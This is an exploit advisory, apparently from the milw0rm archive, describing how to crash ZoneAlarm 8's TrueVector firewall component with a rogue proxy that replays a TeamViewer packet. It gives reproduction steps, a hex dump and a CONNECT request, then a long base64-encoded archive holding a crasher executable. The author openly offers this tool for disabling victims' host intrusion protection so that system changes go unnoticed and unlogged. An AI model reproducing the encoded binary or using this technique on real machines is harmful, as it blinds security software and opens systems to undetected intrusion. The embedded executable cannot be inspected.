Crashing ZoneAlarm 8 by Checkpoint (Component : TrueVector)
=====================
----------------------------------------------
Discovered by : QUAKERDOOMER (Azim Poonawala)
quakerdoomer <[ at ]> fmguy.com
http://solidmecca.co.nr
----------------------------------------------
Method to crash vsmon.exe ZoneAlarm/8.0.020.000 :
+++++++++++++++++++++++++++++++++++++
+ - Discovered on 9:48 PM 9/8/2008 +
+ - Vendor Notified 9/23/2008 +
+ - Vendor has patched the Firewall +
+++++++++++++++++++++++++++++++++++++
Vendor Notification Proof :
http://forums.zonelabs.com/zonelabs/board/message?board.id=security&message.id=19991#M19991
- Keep ZoneALarm 8 running with vsmon.exe running (which runs by
default)
- Set up TeamViewer (version = ??) on a system A. TeamViewer opens a
port 5938 for connectivity.
On System B use Internet Explorer 6 and set proxy settings as IP of
System A and port 5938 for HTTP connections
By default IE 6 has homepage as
http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Leave it unchanged.
- Keep TeamViewer running on System A.
- Launch IE on System B. It will goto
http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
- Stop it and type any other web URL in the address bar. IE tries to
locate that URL via the set proxy IP and port.
00000000 17 24 0A 20 00 1A A9 D8 81 88 13 80 00 00 00 00 .$. ....
........
00000010 00 01 00 00 00 0F 00 00 00 00 00 00 00 00 00 00 ........
........
00000020 00 00 00 00 00 .....
CONNECT 208.185.174.65:443 HTTP/1.0
Host: 208.185.174.65:443
Proxy-Connection: Keep-Alive
Accept-Encoding: gzip
Accept: */*
Content-Type: text/plain
User-Agent: ZoneAlarm/8.0.020.000 (oem-1025; en-US) ZSP/2.2
- ZoneAlarm 8's TrueVector Component crashes with a message box,
minidump file in Temp and on closing the message box, it restarts after
a few moments
- ZoneAlarm leaves the system unprotected (HIDS module alone) till the
time TrueVector component is back.
- Demonstration Video links :
http://www.fileden.com/files/2008/9/18/2104312/rogue_proxy_without_za8_running.rar
http://www.fileden.com/files/2008/9/18/2104312/rogue_proxy_crashing_za8issuite.rar
http://www.fileden.com/files/2008/9/18/2104312/zacrash_details.rar
============
Complete Explanation Page available online at : http://solidmecca.co.nr
Exploits Section
Checkpoint (previously ZoneLabs) ZoneAlarm 8 DoS (Rogue proxy) Crasher
============
- The rogue proxy sends the same packet which TeamViewer does.
ZoneAlarm 8 Internet Security Suite Crasher (Rogue Proxy)
Simulates what TeamViewer sent to crash ZA8 on IE 6 WIndows XP SP3.
Can be used to used as a rogue proxy to crash your victims' ZA HIDS
component for a few moments
rendering your victim vulnerable to unnoticed, unlogged system changes.
[ Not tested with other browsers. Might work on IE7,8 and others. Seems
to be a Browser Independent bug ]
za_crasher_proxy.b64 (Base64 Encoded File)
UmFyIRoHAM+QcwAADQAAAAAAAAAEAXQgkDkAJhUAANtQAAACjYBgHzJoNjkdNRQA
IAAAAHphX2NyYXNoZXJfcHJveHkuZXhlAPBqwGEQIhEVDI0PxYAf26tQagQLejRB
NxB3ulA2DYk0hptptofamkuENpghfBg2wflq3dSWs1JbN32gkcOmnwKUbSafLpCp
CPiThQJ1D7iq5N0SNMG+aGHRMnDpkJ1dxKZOY4252jRUo5tcQfU4KVl5uiW/BXnv
hu+8tQPukndKld6hG+y8vL+eXl7vr9+K38sv55/1f9eXmXd5e57cLW6FAeH418dL
HdUZD/Y2MCYJxWanB0XRTO/R4edO4Ux7X0sFhVY5XWjp8e8e29m9bWp7dtbW1uif
YuT3r+2PddWp9ZWn2tu4cz+czma0ShFq6iGlUwlzv89V+SpO0OQ6xiVOcdmZbNsG
NGc0ES7IoIM/96GGxnqI9CVimnDBRMQ8WCeCd8Q5JWEtE0OT1qXzI+IbVZU82WO/
b3U+i5uETJXnVESaLVGkKXYT7hsi2VcA9NdTpsuw5eFPvUxnnGz6BQmfvygw1n7F
8+N34HXHzXRiB0DJMcqy57KVPB37vdB/eV8D4dv0JyBseneV7Oh9yA/+a8Y0PSvD
tR9gqYW0ptRej8PfH++bbHhstEzKUOFAp9EygozMJNv02CLu7wke1UysblcTGHqB
zLwSejIwOhsfYZRif5QEfW1G6N8cRfl3uzidLgP4IkPNmLvSgIgZ8M0QHtKZRUxL
9Q0cQyH4GwEZ/3HJu+kjuYOjzJxyR9xPMUEeoYWTQFUI1xyc+xMJZy+W9CuK3b9D
RXsdIdQc0anQdqY+9CLHl5gV1qOmZk2Cc1ax7K/FE6tLzOHH5EMwWBXRzRLkyOpZ
NSfYEyX8YFqcKb6/fNBF7zPNdaOLlzV3eCR9v+nnInpCRtdeaA2XeeFQQJnRQfqZ
s5Qdiki8/ghokL7ADOBjW1cCbBDwIObMNxPMgs5B6gs+2/wdGD+PNCEMhrOMKZLB
RtlfsjdkduD6BmXcaD/WIrAncjfczZyaBZ4MeA0hL+DNF1z68WTC5m99XtJECGYr
IZp/Gz1GInB9nqAl9e8Ls12exCHACWSDVgRS7HG969R7M2OnDSjcbHn92LvpLgeZ
0OYwSV8lxGbfCmh/3FgsuLzmUC7pxLd4l/8HwJiGkH/QWBWWHUdJgw2/lM2Hl+Dh
irJ1AVL9JpmE1MrnigGD0gb0oZdhvpQMTa3lRM5HZXiTQ8yIGyjeVgF7d68hmYmv
TjbGzO1ZGggzidXJI4VbLvolI6Ixc3Yb+0KbYd3VCKmVzEm5r10iubKzggIPvjNv
3iWfyOMLC8G0GfXB14x7XlQzjgxlcOo+A2pEts8wn8slNzjE2v/cAjlzMVEHb+VB
xn8/B+1LJPtmTaL0IYVfSyiK94Bz/Ilkmk+zGGxzkmMiqv26RUZCff8DEY3FevYp
koQo0phKpVOvHBOOSkg9sEeGHH8CSqJaGdTMXP5rE4T5hFXDu+FiY2MwUWI3Hfvb
vBxE2XvhYptvyDf9ViEOKHHxAh9piDWoKO/SgJn2aXfSAubAmvXFfBJ4Qftgv/GZ
TQqXOhO4yqHu5CPQDj7eZB5wM/7ME3nHKrbJMmZDEzAu8AV72/rG/8xp5LAIfoDj
ZBD7zAG8oNTYQktXl01jmVYXVjdTPqu8BQYuUic0VX94sHv1iHdQOPMzCTX8vQgc
HMSEazwNJLrJRK+WctPo6poCvcx11QqdPNZcmharAuhAk4TsxJWaABlqxf1HBKau
+QaTX4p0KH56EOHyS4Y6YLhy4EgqTwYZcjjGloxtHdDpcd3AY3JPNJfE3RN2TeE3
pN+TgE4ICvVf6nO05pp/Em73+42O81uSYw2/FZsPrGpkeZ8ps178Wx4yzjh7nvyc
V8nOxfnm4rmeTaj2eU5EYw8eSWZGXvaVlvjd13y3/PyTFZ6EuTDK/6OgFhXTxkdL
d4UDjI9hA6SnBjGm/6TZXhP+kbbbOAfF8uNjeP48cKMvijkUOFG0xM01vJu7xdAk
W8XE9ZNSr311pQelysP+6SNKdAFoD2qZ10YYmr43CiVMNqHu4q6gBfvGqXE/vKll
je9kjV/D8AxsjiTXp4Ucdwbn1va/gUPuG5Yxe7jZ6dFxvD+irQ5DugKT5nE+ow5H
g3Gdutt2vApY0Mx+EcNz8e376kiSNIFsfm5HG9TRC5jh/EYtjQhmK4pf1og8F4P/
JUsf8g7/+DvBw8T4FIf40CTPE/Io3mTzI13iVvmdA07XJhMngvGjxOcXx/IQyc8O
o3dKPV+cJPXr/d5G3gLj29BYFRg37IciEm/TC8Anq37MMcEGwCYV/MhjhFbj37Qy
U1Hs382l88m/nCcq/nSfimvTlzx7R4OOZAohZROESaKyF113TjLMmrvvmCc3g3F3
/kK3zPImtx4ohfmgYd4kLepNDmfJ93DpmTzQNU2y5DZtOxNt9FbcOWNrbzPU8Nab
SJb2qabv6A1I/rZyI9Ebspp2/q2pgB8UVAlUJ02miVSAX9GkM0aTwoi0UDpQOZ9L
2Rqe+xwtEew5DKl3O47WpHReDc/mSaLH4tAL9kl3OwVmGHgLMhhEFaBi4BZsMbYF
TZHdBncBDc3t2YzpQgaJMo6YLjP/AoeWMUmhNTft8abSq0kc0WmQUP+R03GgaAz/
17TMt9YJfLPfXQKpAJA6cGjEfd5zIH6X/o4nowfqsJFLYbrWwPeGRdqB+z/OetPM
55vnbzB08TE5+l4o98DnQOTeM7xqyxucrIhOXlRNjEk0x5oBMgkyAzBGYDJbMW/K
LXy3HnRPsH5TliB42jNUaY+rLBkekDegI8JREqSaYlwREloR2SuJsCWBHBKomvIe
SbJOknCNAmlWo/nxRrkisaP/ztA1THB6OD//D/8lIBcr+QroWvWtL+70GA/wc1MT
HpSOj/G1mrqD6Wqpazwz6M+mrKWtqaisPrNZqa+ItXj2v8U+SOD9xTNcQqbV1axK
t7e2bbRs7bH+Of/E/bbJy9cRBtcda2VrZv7mfb5DP2J/EiwzVbc2yLa470/atkG7
1s+tIokB/YtuLmfc3Dk+kjDPUdW/tbGIvfiOH66JNtZn7OGj51kCID63bxmEdJpY
k6OMBo3ENLF1bOBxWcRLS3fIxwI2Bsyejh1ZipH1ctnGOxcnvBL4dFsYsXbqKdzb
CLtm7dy8MTHrlvszafXUtLXUGaSYASFF1kiuYqjxzXLqOAOrzXbf+31khvu2L8wy
e5/RHn9l6HM8zc9hdHlVgP9NHl2OfObZwqulCCT1VqvA1NNTa7uNPPVFTPY5W+DV
eDPamuqaye8PVavUiGEsbTHUH1o2euXDxF7Pd++dbVyfqNQeb5t7LSCKoRdIVtTS
1lRTxmMlnvdG/70+ybOncV57Z9Gveoi8I+wiR2gpNPz/bj/rNu3S/m8NLJ1Z9u67
ij7rtxM88DTwm9Pt4q9S5RpUbe11YvbpT9I2Hu00bTTKnh9pdKf9KOLQHfu90H4r
SrLA+tBGmtJuFgO6A0xOYEepWCHKQ/0uEIjCH+5ROaToLNCZEgnYRpiUhKsmwI4I
8Jtibgl8Tdk35MAmCTjk5ROaSCTFIbp8KSIwjPktyTBGJJYneEzhGBGhOwJ/+lKM
j0rhwbY1Swk+ydUXDpEZejdyl4dn7x31HVspmc1dtDKnusa3I9fbWjaKAdzkW5pg
w7m4sHaLl6Os7Q5BAZp+1bRgWz2zjG0g43nVnNts3QzjIn9/DayN48VPxncJH0V6
DZ5EVG5eJA7kEjLCiZu/ngkZ6xx/yGCEXygTcMDaRMh55i2sRnOnTuPoq6XQj327
oqUDGysnb99aGB95CR49jpo2RT6YI9cjrHrGPM7d5Ops/a5Dc2olcq+WxkDZ18xf
OrPJKdwl+yCIvW7y5BftEd5KxU11brKbwu408+4dpC1XK/3hVFZq6iqkik3Vl+ZH
32bd6iqXoX8CfshnUQiahHUxgSzYCh+hn28Kivkm2A+SGlmELhoUxJMVLg3B8exT
AsQx4ADUHQUfzYFgpBW8K6vlKlC6J+2w5fZrj0r5Sc3TFIVlUeV8n0qp0NGfWmHd
iEnyL+ysl7E68C6VSPLTYomqYrCWYUT6HcaA/W3h2pXNvChbIGBJbE1rjDaf7Mtl
W0X0hNeayTWov0XskkyyYqx6y0V5mQ1mAmwKqXmp9F3JpkkvCwrFQWtFzDg9TE6X
WGzZh07gnNJtibknOJ9Ynmk+Am5JfEgk84m6J0Cbom7J0SeeTeExSb0m9J0yfbJv
yfMTgk4BDi+su3pB08EjIPJSfQ/B6asrrN3b2KyfWqgMIHOlOpWeLC2/XeHjyiyS
qHJ9uW00/WuFVkXndg6NwivQ+W71tiDw6frld4+cv3FvPPXI1XElFn0J+v0JklNd
Ib/y+s+F0l6vPWvVQsnlDQBAcWSCNbd0euJrCXzgJAqmo8gCY/ZkwtD+3wAcfwbJ
WkWO3a0kHPJ9P8EuQfi4/sBWfX1qwQGrMNIIJ0t29ZylWGkBKpt9H0PnF8UuNovk
0Dm3YBoq/hy6FNpMfP7B6AvTQA7HLmI91STXLSGr9GQfut/ROmxDnzBZaUQLWQ6B
VpAKAs9SUq1wrXFKMs0CmFMZVz0lhw2TJpi+1oHOQkbA+H6FaviHphxpQVH9ROxM
8PMTKaAzBzgfqKGydBIAyIUy5Kk91p4bUOmw67tOUNlADnB9cq/VYF1l+3OVQGpU
oDv2Ovl0GpUtSpIV5zu7p5YMqge5asA3ot2cTutgxB//EfqQK0ZL4lIS+C3XBWrJ
wCbgPi1IVpybwjgPitQrSE3RKsm9C3RBWgJuSTpMALaIVeE9knNJhBbowrRE80mm
Jygt1QVqSb0jwnOC3QBXTE3BJknRC3tgrcE5RMUh2cC1cBVEnJJBI0C27CtoTCJx
yHhbeBV2Tjk5RKALevCtcTgkviNQt2AV2BOETfkqwtuArYEwSYBLALdoFXBPVJgk
eBbqwrVE35NsS6C3sArryYBN2EFPqTvgeybbJyvp/LQbBUKSZmtkjaP7bZFTTMJS
gozn7PrHC5082qgGBu2Wy0V7nSZd+SQWdFdHB4qMRvw8f/gXyi/Ed88rHc7YvR3d
1LQ9ZswaH7P1qJqdCp5LgnQlIU97/2j80Cs2R2TCJgBbnArOkRJzSYQW5sKzhHhO
UTlBbmQq0JaE4QQU258L9QlJ2gVaE5wfuTg6ZkjgnsE/bC+UW2L06Ih4PnC8+WD5
f5pf+NgXR+XprKMRD8C/nbo270RfFkGzLP0wQ20+klNjHUY5QDJ8t9K+X1OQTsnS
+mVvm3t2wS90OllFK6p6YgVfrJlbDURJiV/xgfMompUQSsm1SoQqWvhA3S4kYoHA
LOWH43i4DOFKcs+0KYS5Ne4KX0g/QlrIQq2iE1rCZYK7ZO0MpJavoZOSDYgNx3mt
D3SvjE4Tb6GVS5AYBVaDd7CoHkQsHlj76fvupYY0ogPoS0maPCbQS2VFe3KsyEu8
LXVFKBckexKNQm6U08liNpCF7+PPlsqrHpQjeriR7BVXOM5UogP9YU0BuoJrQ6fz
lzV/jhjwroIOHbvHDZCw/GS2kOLLPsjsoK6YCrXJH3pSbXafwwPtw569IkNQjZgK
+VTK1wyyrDvOKbYHQStYJT7AIev6IZJaugnauTRcK+mBfQp/3iBoljDmz2zbpL/W
OhzIRvV0F35mUmTgrYrJX8RdU2SwlR4uJE2IHoln/CUupmQrCdspXRZ6eGYAOgN2
PDsq9IJ9/LyfI9FbwZddAUnbT9rILSCBradbL44/GHT+auYh8uJENbsQO5LP+aXT
lmLGi7PKx6/dlF84YE6s06VvbNFzV/8ZeRZrxW91MfrIHPjhDhcgB9lHrlwGZAwA
nowJMicbhEcIILWZp28zgSHqoJ2+fsFznu9zC2cdDWpEDsJKsKW+tDnrhFbRcgHI
H1oU7jMJ+ZBJWr7CQFaK74pLLty/olLgs/XKa8J+0AiE/cA0h0hNUrj2OeFn+gC6
XPV+hmZP2ait2Ygd6uUegzOVTXUQjz4c6opNwptim4Cb8Dgg6Fojb2z5rRblcSNw
BYBO+KHhP+1TRyWZ+0okcOH5QzJiI55TlLt73yFHcObBnJq54Tdgnb38sNIBSQ59
0zyp+rIU0E7oJ6MKfkiK7pcvlzCKMJ/XAwl0TW8KXRYJ3UePLPAhGzXFr74GAuJH
ts8rxY/PCD13OjMzC1/GfHCghZ2z9Bypd6qCV3zPWtEUQtY5VntEB8+XWotnqL94
lcAFuPXZG8PKAh4vLdB95LvyUIjjSuoRIeuW1rWxk9n1Yc145G/t0Hr/JldWrlA1
hrDwdGyk7AiOS1Lps7dbVy4UIBsqEQMgpVDq4EnUQWWJJPD6NAauNAfQcCW7WOaN
Xo6uDahb6EpGFc2TZ+7RQjlubiOvGJcuJUVsxRJxtIgxrPJETQtX41hs/QJgrZu5
n6E4Vsj9N0Nk5uZ/TpYEg/cSpLkq+NluVH1IISWXJKcYDWV+rrtV4dQhV1tRX0+s
yNUVWspkKrVVtcMw/1Z1avEEFb0AggarZQfGcElnIU9drKzKDylDsriUp2i6k+mG
taNUIpevqEm9vkOt3wU1opVdBDDCNHeSXNF2+WJO7dWKV5jIR+3Rj0qeFb6Ja0So
JOX2K6CzyOtZGI7fZIN4o4ziZNX5BoTww30sm1beTF2MAdi+uYmObVBP1BlNlJj9
cO5KLKX4hrRSM10tay3tNlkXZLMtPiiUSdbfe6oMb7KFv98tXvrj39Rq6dcqVo5b
PFq0pFZL1JJJ1S86Jo+eLTWoBXJSpyj6uvqqpCONV6ysjb09RW01ZqqsYOTM1dWw
Fu+XMtTcSipAoKMOFrxDkEvVHVYZW1nH+sWz5ys1azPiO3Sk3NnYoVax20ksS9Wq
TEv1CPCnDariWxTSfQ22tErsQqwNb6FXlYsoZTLtnq70KlN5KpKNacqZzUbQ3DbX
VtLqYvqps+RqHsc561oFgzJdIkNrV9SAN3dvG6UCpRHU0rvWWejXktWJyUnEJQOm
+/he2VPUKUmqmFKu48tP0NRBKBauqa/V+EhT0tdSyNoeUgOyyTJZSJaSWJSvry5g
y6N5buuTY8iEZO7qQaVOX1TCpXPy5Up2VVOy2N5e/NfP9SIuUgkW7bjSxFHyZdM1
ysPSsB6mj4NrYXL0CoNT6GSuJL8CCnf87NkTcBPbItco7t2zjI0Yp3Eh9IiQbknO
W8FiRkXuqXS91d7OyjFWzl2blDkMfN1N/ich/l81RPLlEdysZyZSym13LJ/K+NJe
0mUj+/UJr5crMjh/Kw7pva/6QMQ9ewBABwA=
# milw0rm.com [2009-02-20]